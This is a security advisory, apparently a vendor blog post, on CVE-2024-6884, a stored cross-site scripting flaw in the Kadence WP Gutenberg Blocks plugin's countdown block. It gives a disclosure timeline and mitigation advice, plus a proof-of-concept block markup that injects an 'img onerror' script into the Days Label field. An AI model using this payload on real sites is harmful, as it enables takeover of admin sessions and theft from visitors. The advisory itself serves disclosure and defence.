In an era where digital content creation via platforms like WordPress is ubiquitous, the importance of cybersecurity cannot be overstated. A recent discovery has brought to light a critical vulnerability in the “Gutenberg Blocks with AI by Kadence WP” plugin, a popular tool used by over 400,000 installations worldwide. (CVE-2024-6884)
| CVE | CVE-2024-6884 |
| Plugin | Gutenberg Blocks with AI by Kadence WP < 3.2.39 |
| Critical | High |
| All Time | 21 706 000 |
| Active installations | 400 000+ |
| Publicly Published | July 15, 2024 |
| Last Updated | July 15, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6884 https://wpscan.com/vulnerability/1768de0c-e4ea-4c98-abf1-7ac805f214b8/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
Timeline
| May 22, 2024 | Plugin testing and vulnerability detection in the Gutenberg Blocks with AI by Kadence WP have been completed |
| May 22, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 15, 2024 | Registered CVE-2024-6884 |
Discovery of the Vulnerability
The flaw, designated as CVE-2024-6884, was uncovered during routine security testing. It exploits a Stored Cross-Site Scripting (XSS) vulnerability that can be triggered by embedding a specific shortcode into a new post.
Understanding of Stored XSS attack’s
Stored XSS attacks are particularly dangerous because they allow the attacker’s malicious script to be saved on the server, where it can be executed every time the affected page is loaded. This method has been exploited in various instances across different platforms, leading to unauthorized administrative access, data theft, and other malicious activities.
Exploiting the Stored XSS Vulnerability
The point of entry for this vulnerability lies in the plugin’s countdown block feature. When a contributor adds a countdown block and manipulates the ‘Days Label’ field with a malicious script, like <img src=x onerror=alert(1);>, it executes an XSS attack upon loading the page in a viewer’s browser.
POC:
<!-- wp:paragraph -->\n<p>123</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/countdown {\"uniqueID\":\"319_fa912e-cc\",\"date\":\"2024-05-24T05:14:16.437Z\",\"timestamp\":1716545656437,\"timeOffset\":0,\"daysLabel\":\"\\u0026lt;img src=x onerror=alert(1)\\u0026gt;\"} -->\n<div class=\"wp-block-kadence-countdown kb-countdown-container kb-countdown-container-319_fa912e-cc kb-countdown-timer-layout-block kb-countdown-has-timer\" data-id=\"319_fa912e-cc\"><!-- wp:kadence/countdown-timer {\"uniqueID\":\"319_638135-83\"} -->\n<div class=\"wp-block-kadence-countdown-timer kb-countdown-timer-319_638135-83 kb-countdown-timer\"><div class=\"kb-countdown-item kb-countdown-date-item\"><span class=\"kb-countdown-number\"> </span><span class=\"kb-countdown-label\"> </span></div></div>\n<!-- /wp:kadence/countdown-timer --></div>\n<!-- /wp:kadence/countdown -->____
The implications of such a vulnerability are extensive. By gaining admin rights through XSS, attackers could potentially take over entire websites, manipulate site content, steal sensitive information from both the site and its users, and deploy further attacks on visitors.
Recommendations for Improved Security
To mitigate this vulnerability and enhance overall security, users of the Gutenberg Blocks with AI by Kadence WP plugin should:
- Immediately update the plugin to the latest version if a security patch is available.
- Regularly review and sanitize inputs across all forms and content blocks to prevent script injections.
- Implement a robust Content Security Policy (CSP) that restricts the sources from which scripts can be loaded.
- Educate users with administrative privileges about the risks of XSS and the importance of secure coding practices.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-6884, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
ARTYOM K.
